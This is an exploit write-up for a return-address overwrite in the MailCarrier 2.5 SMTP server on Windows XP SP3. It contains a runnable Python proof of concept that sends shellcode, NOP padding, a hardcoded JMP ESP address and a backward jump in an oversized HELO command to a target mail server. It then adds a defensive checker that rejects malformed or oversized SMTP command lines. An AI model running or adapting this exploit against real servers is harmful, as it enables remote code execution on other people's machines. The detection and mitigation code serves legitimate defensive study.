mailcarrier25 email program: classic return-address overwrite on XP SP3

Software: mailcarrier25

Environment: XP SP3, under normal conditions

In general the input is found to be checked for bad strings, so constructing the attack is still somewhat tricky...

Email program; messages can be sent without an authenticated login.

Requires familiarity with the SMTP protocol commands.



Python PoC:

```python
# Original PoC, Python 2 syntax (byte strings, print statement)
import struct
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 108-byte shellcode
shellcode = (
    '\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B'
    '\x12\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20'
    '\x01\xC7\x31\xED\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E'
    '\x08\x45\x78\x69\x74\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01'
    '\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68\x64\x61\x40\x01\x68\x40\x70\x61\x6E\x89\xE1\xFE'
    '\x49\x07\x31\xC0\x51\x50\xFF\xD7'
)  # 108 bytes

# Layout: shellcode, NOP padding out to offset 5094, the saved return address
# (little-endian JMP ESP), then a short backward jump that lands on the shellcode.
buffer = shellcode + '\x90' * (5094 - 108) + ('\xb3\x9a\xd0\x7d') + ('\xe9\x11\xec\xff\xff\x90')
# must have ()
# Found JMP ESP at 0x7dd09ab3     Module: C:\WINDOWS\system32\SHELL32.dll

try:
    s.connect(('10.10.10.130', 25))
    s.send('HELO ' + buffer + '\r\n')
    h = s.recv(1024)
    print h
    s.close()
except:
    print 'could not connect to SMTP!'
```
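From the defender's side, the trigger above is an SMTP HELO argument thousands of bytes long, full of non-ASCII bytes, sent before any authentication. The following checker is an added example written for this page, not code from the original post or from the MailCarrier product; it shows how an SMTP front end, proxy or IDS rule can reject such a command line before it reaches a vulnerable parser. The length limits come from RFC 5321 (255-octet domain, 512-octet command line including CRLF); the run-length threshold and the sample session lines are constructed assumptions.

```python
"""Defensive SMTP command-line checker (added example; not from the original post).

Rejects command lines that violate RFC 5321 size limits, carry non-ASCII or
control bytes, or contain long runs of one byte (a sled-like pattern), all of
which describe the oversized HELO seen in the PoC above.
"""
import re
from typing import List, Tuple

MAX_DOMAIN_OCTETS = 255      # RFC 5321 section 4.5.3.1.2
MAX_COMMAND_LINE = 512       # RFC 5321 section 4.5.3.1.4, includes CRLF
SLED_RUN_THRESHOLD = 64      # assumption: 64+ identical bytes in a row is suspicious

# Commands whose single argument must be a domain or address literal
_DOMAIN_COMMANDS = {b"HELO", b"EHLO"}


def check_smtp_command(line: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for one raw SMTP command line (CRLF optional)."""
    if len(line) > MAX_COMMAND_LINE:
        return False, f"command line too long: {len(line)} > {MAX_COMMAND_LINE}"
    body = line.rstrip(b"\r\n")
    # SMTP commands are 7-bit ASCII; control bytes and high bytes never belong here
    if any(b < 0x20 or b > 0x7E for b in body):
        return False, "non-printable or non-ASCII byte in command"
    parts = body.split(b" ", 1)
    verb = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else b""
    if verb in _DOMAIN_COMMANDS:
        if not arg:
            return False, f"{verb.decode()} requires a domain argument"
        if len(arg) > MAX_DOMAIN_OCTETS:
            return False, f"{verb.decode()} argument too long: {len(arg)} > {MAX_DOMAIN_OCTETS}"
        if not re.fullmatch(rb"[A-Za-z0-9.\-\[\]:]+", arg):
            return False, f"{verb.decode()} argument contains characters not valid in a domain"
    # Heuristic: a long run of a single byte is never a legitimate argument
    run = re.search(rb"(.)\1{%d,}" % (SLED_RUN_THRESHOLD - 1), body, re.DOTALL)
    if run:
        return False, f"run of {len(run.group(0))} identical bytes (sled-like)"
    return True, "ok"


def audit_session(lines: List[bytes]) -> List[Tuple[bytes, bool, str]]:
    """Check every line of a captured session; return (first 24 bytes, accepted, reason)."""
    return [(ln[:24], *check_smtp_command(ln)) for ln in lines]


# Constructed sample session: two benign greetings, then three malformed ones
SAMPLE_LINES = [
    b"HELO mail.example.com\r\n",                  # benign hostname
    b"EHLO [192.0.2.10]\r\n",                      # benign address literal
    b"HELO " + b"\x90" * 300 + b"\r\n",            # NOP-sled style bytes
    b"HELO " + b"A" * 100 + b".example.com\r\n",   # within limits, but sled-like
    b"HELO\r\n",                                   # missing argument
]

if __name__ == "__main__":
    for prefix, ok, why in audit_session(SAMPLE_LINES):
        print("ACCEPT" if ok else "REJECT", prefix, why)
```

A front-end check like this limits exposure to the whole class of oversized-argument bugs, but it is a mitigation, not the fix: the actual defect is an unbounded copy inside the server's command parser, and the line-length ceiling only stops a payload that needs more than 512 bytes to reach the return address.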
Original article: https://www.cnblogs.com/zcc1414/p/3982373.html